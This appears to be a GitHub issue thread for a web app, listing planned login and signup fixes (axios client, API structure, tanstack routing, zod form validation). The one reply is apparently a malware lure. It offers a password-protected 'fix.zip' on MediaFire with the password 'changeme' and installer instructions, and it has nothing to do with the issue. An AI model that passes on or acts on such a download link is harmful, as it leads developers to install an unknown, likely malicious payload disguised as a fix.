### ISSUE TITLE
Login Signup page Issue fixes

### ISSUE THREAD

**Issue by abhishek10281** [polymetrics-ai/polymetrics#6]
1. Fixes on axios client file
2. Change in services API structure
3. Update tanstack structure to include direction entry to dashboard if token exists and is valid
4. update validation in zod for forms

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
